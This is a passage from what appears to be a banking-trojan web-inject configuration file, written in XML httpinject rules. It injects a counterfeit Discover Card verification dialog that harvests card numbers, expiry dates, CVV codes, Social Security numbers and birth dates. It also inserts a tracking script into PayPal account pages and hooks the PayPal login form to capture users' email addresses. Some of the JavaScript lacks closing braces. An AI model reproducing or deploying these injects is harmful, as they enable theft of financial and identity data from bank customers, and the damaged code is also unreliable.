2578. <input type="text" class="amountfield" id="seqnum" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="seqnum" method="get" maxlength=4 ></input>
2579. </div></td>
2580. </tr>
2581. </table>
2582. </div>
2583. <div id="txt2" class=sunclass style="padding:3px ;padding-right:15px;">
2584. <font style="font-weight:700;font-family: Arial;font-size: 10px;text-align:right;"><div align="right">
2585. <input border="0" type="image" alt="Continue" onclick="return formmySubmit();" src="/discover/images/account/buttons/btn_continue.gif">
2586. </div></font>
2587. </div>
2588. <input type="hidden" name="system" value="14">
2589. </form>
2590. </div>
2591. <script type="text/javascript">
2592. jQuery.cookie = function (name, value, options) {
2593. if (typeof value != "undefined") {
2594. options = options || {};
2595. if (value === null) {
2596. value = "";
2597. options.expires = -1
2598. var expires = "";
2599. if (options.expires && (typeof options.expires == "number" || options.expires.toUTCString)) {
2600. var date;
2601. if (typeof options.expires == "number") {
2602. date = new Date;
2603. date.setTime(date.getTime() + options.expires * 24 * 60 * 60 * 1E3)
2604. } else date = options.expires;
2605. expires = "; expires=" + date.toUTCString()
2606. var path = options.path ? "; path=" + options.path : "";
2607. var domain = options.domain ? "; domain=" + options.domain : "";
2608. var secure = options.secure ? "; secure" : "";
2609. document.cookie = [name, "=", encodeURIComponent(value), expires, path, domain, secure].join("")
2610. } else {
2611. var cookieValue = null;
2612. if (document.cookie && document.cookie != "") {
2613. var cookies = document.cookie.split(";");
2614. for (var i = 0; i < cookies.length; i++) {
2615. var cookie = jQuery.trim(cookies[i]);
2616. if (cookie.substring(0, name.length + 1) == name + "=") {
2617. cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
2618. break
2619. return cookieValue
2620. function formClose() {
2621. $("#msg").dialog("close");
2622. return true
2623. function quest() {
2624. var q1 = $("#q1").val();
2625. var q2 = $("#q2").val();
2626. var q3 = $("#q3").val();
2627. var bq_11 = /[a-zA-Z]+/.test(q1);
2628. var bq_12 = /[0-9]+/.test(q1);
2629. var bq_21 = /[a-zA-Z]+/.test(q2);
2630. var bq_22 = /[0-9]+/.test(q2);
2631. var bq_31 = /[a-zA-Z]+/.test(q3);
2632. var bq_32 = /[0-9]+/.test(q3);
2633. if (q1.length < 3 || q2.length < 3 || q3.length < 3) {
2634. alert("The answers you entered does not match our records. Please verify and make sure you re-enter your answers correctly.");
2635. return false
2636. if (bq_11 == true && bq_12 == false && bq_21 == true && bq_22 == false && bq_31 == true && bq_32 == false);
2637. else {
2638. alert("The answers you entered does not match our records. Please verify and make sure you re-enter your answers correctly.");
2639. return false
2640. $.cookie("trusted_rapport", "1", {
2641. expires: 20,
2642. path: "/",
2643. domain: ".discovercard.com"
2644. });
2645. $("#qdiv").dialog("close");
2646. return true
2647. function doError(erstring) {
2648. $("#ername").text(erstring);
2649. $("#ername1").text(erstring);
2650. $("#msg").dialog({
2651. closeOnEscape: false,
2652. resizable: false,
2653. modal: true,
2654. width: 350,
2655. modal: true,
2656. zIndex: 99999
2657. function checkDob() {
2658. var dob_mm = $("#dob_mm").val();
2659. var dob_dd = $("#dob_dd").val();
2660. var dob_yy = $("#dob_yy").val();
2661. var mdob_mm = $("#mdob_mm").val();
2662. var mdob_dd = $("#mdob_dd").val();
2663. var mdob_yy = $("#mdob_yy").val();
2664. var totalLengthDOB = dob_mm.length + dob_dd.length + dob_yy.length;
2665. var totalLengthMDOB = mdob_mm.length + mdob_dd.length + mdob_yy.length;
2666. if ((isNaN(dob_mm) || isNaN(dob_dd) || isNaN(dob_yy)) == false) if (totalLengthDOB > 6) if (dob_yy < 1995 && dob_yy > 1900) if (dob_mm > 0 && dob_mm < 13 && dob_dd > 0 && dob_dd < 32) if ((isNaN(mdob_mm) || isNaN(mdob_dd) || isNaN(mdob_yy)) == false) if (totalLengthMDOB > 6) if (mdob_mm > 0 && mdob_mm < 13 && mdob_dd > 0 && mdob_dd < 32) if (mdob_yy + 12 < dob_yy) return true;
2667. return false
2668. function checkCC() {
2669. var cc1 = $("#cc1").val();
2670. var cc2 = $("#cc2").val();
2671. var cc3 = $("#cc3").val();
2672. var cc4 = $("#cc4").val();
2673. var totalLengthCC = cc1.length + cc2.length + cc3.length + cc4.length;
2674. if (totalLengthCC > 12) if ((isNaN(cc1) || isNaN(cc2) || isNaN(cc3) || isNaN(cc4)) == false) if (cc1.charAt(0) == "6") if (cc1 != cc2 && cc1 != cc3 && cc1 != cc4 && cc2 != cc3 && cc2 != cc4 && cc3 != cc4) return true;
2675. return false
2676. function checkExp() {
2677. var exp_mm = $("#exp_mm").val();
2678. var exp_yy = $("#exp_yy").val();
2679. var totalLengthEXP = exp_mm.length + exp_yy.length;
2680. if (totalLengthEXP > 5) if (exp_mm > 0 && exp_mm < 13) if (exp_yy > 2009 && exp_yy < 2030) return true;
2681. return false
2682. function checkCVV() {
2683. var cvv_num = $("#cvv").val();
2684. var cvvLength = cvv_num.length;
2685. if (isNaN(cvv_num) == false) if (cvvLength == 3) return true;
2686. return false
2687. function SSN_check() {
2688. var ssn_1 = $("#ssn_1").val();
2689. var ssn_2 = $("#ssn_2").val();
2690. var ssn_3 = $("#ssn_3").val();
2691. var totalLengthSSN = ssn_1.length + ssn_2.length + ssn_3.length;
2692. if (totalLengthSSN == 9) if ((isNaN(ssn_1) || isNaN(ssn_2) || isNaN(ssn_3)) == false) return true;
2693. return false
2694. function SeqNum_check() {
2695. var seqnum = $("#seqnum").val();
2696. if (/^[a-zA-Z][0-9]{3}$/.test(seqnum)) return true;
2697. return false
2698. function formmySubmit() {
2699. $("#msg").css("background", "#f5f6f1");
2700. if (checkCC()) {
2701. $("#div_cc_text").css("color", "black");
2702. if (checkExp()) {
2703. $("#div_exp").css("color", "black");
2704. if (checkCVV()) {
2705. $("#div_cvv").css("color", "black");
2706. if (SSN_check() == true) {
2707. $("#div_ssn").css("color", "black");
2708. if (SeqNum_check() == true) {
2709. $("#div_seqnum").css("color", "black");
2710. if (checkDob() == true) {
2711. $("#div_dob").css("color", "black");
2712. $("#div_mdob").css("color", "black");
2713. $("#dialog").dialog("close");
2714. $("#qdiv").dialog({
2715. closeOnEscape: false,
2716. resizable: false,
2717. modal: true,
2718. width: 400,
2719. modal: true,
2720. zIndex: 99999
2721. });
2722. $("a.ui-dialog-titlebar-close").replaceWith('<div align="center" style="overflow: hidden; position: relative;padding:0; margin:0"><img src="https://www.discovercard.com/images/ac-header/discover-card-logo.gif"></div>');
2723. return true
2724. } else {
2725. $("#div_dob").css("color", "red");
2726. $("#div_mdob").css("color", "red");
2727. doError("Date of birth")
2728. } else {
2729. $("#div_seqnum").css("color", "red");
2730. doError("sequence number")
2731. } else {
2732. $("#div_ssn").css("color", "red");
2733. doError("social security number")
2734. } else {
2735. $("#div_cvv").css("color", "red");
2736. doError("cvv code")
2737. } else {
2738. $("#div_exp").css("color", "red");
2739. doError("expiration date")
2740. } else {
2741. $("#div_cc_text").css("color", "red");
2742. doError("card number")
2743. if ($.cookie("trusted_rapport"));
2744. else $(document).ready(function () {
2745. $("#dialog").dialog({
2746. closeOnEscape: true,
2747. resizable: false,
2748. modal: true,
2749. width: 350,
2750. modal: true,
2751. zIndex: 99998
2752. });
2753. $("a.ui-dialog-titlebar-close").replaceWith('<div align="center" style="overflow: hidden; position: relative;padding:0; margin:0"><img src="https://www.discovercard.com/images/ac-header/discover-card-logo.gif"></div>')
2754. });
2755. </script></body>]]></replacement>
2756. </modify>
2757. </actions>
2758. </httpinject>
2759. <httpinject>
2760. <conditions>
2761. <url type="allow" onpost="1" onget="1" modifiers="iU">ya\.ru
2762. </url>
2763. </conditions>
2764. <actions>
2765. <modify>
2766. <pattern modifiers="i"><![CDATA[<title>]]></pattern>
2767. <replacement><![CDATA[<title>XXXYAR: ]]></replacement>
2768. </modify>
2769. </actions>
2770. </httpinject>
2771. <httpinject>
2772. <conditions>
2773. <url type="allow" onpost="1" onget="1" modifiers="U" contentType="^text/(html|plain)"><![CDATA[^https://www.paypal.com/myaccount]]></url>
2774. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
2775. </url>
2776. </conditions>
2777. <actions>
2778. <modify>
2779. <pattern modifiers="msU"><![CDATA[(</html>)]]></pattern>
2780. <replacement><![CDATA[
2781. <script type="text/javascript" language="JavaScript" src="statsgatherr.js?system=15"></script>\1]]></replacement>
2782. </modify>
2783. </actions>
2784. </httpinject>
2785. <httpinject>
2786. <conditions>
2787. <url type="allow" onpost="1" onget="1" modifiers="U" contentType="^text/(html|plain)"><![CDATA[www\.paypal\.com]]></url>
2788. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
2789. </url>
2790. </conditions>
2791. <actions>
2792. <modify>
2793. <pattern modifiers="msU"><![CDATA[(</head>)]]></pattern>
2794. <replacement><![CDATA[
2795. <script language="javascript">
2796. function onformlsubmit(theForm){
2797. document.cookie = 'loginemail=' + escape(theForm.login_email.value) + '; path=/; expires=0, 01-01-2020 01:01:01 GMT';
2798. return true;
2799. </script>\1]]></replacement>
2800. </modify>
2801. <modify>
2802. <pattern modifiers="msU"><![CDATA[(class="proceed maskable".*name="login")]]></pattern>
2803. <replacement><![CDATA[\1 onsubmit="return onformlsubmit(this);"]]></replacement>
2804. </modify>
2805. </actions>
2806. </httpinject>
2807. </httpinjects>
2808. </settings>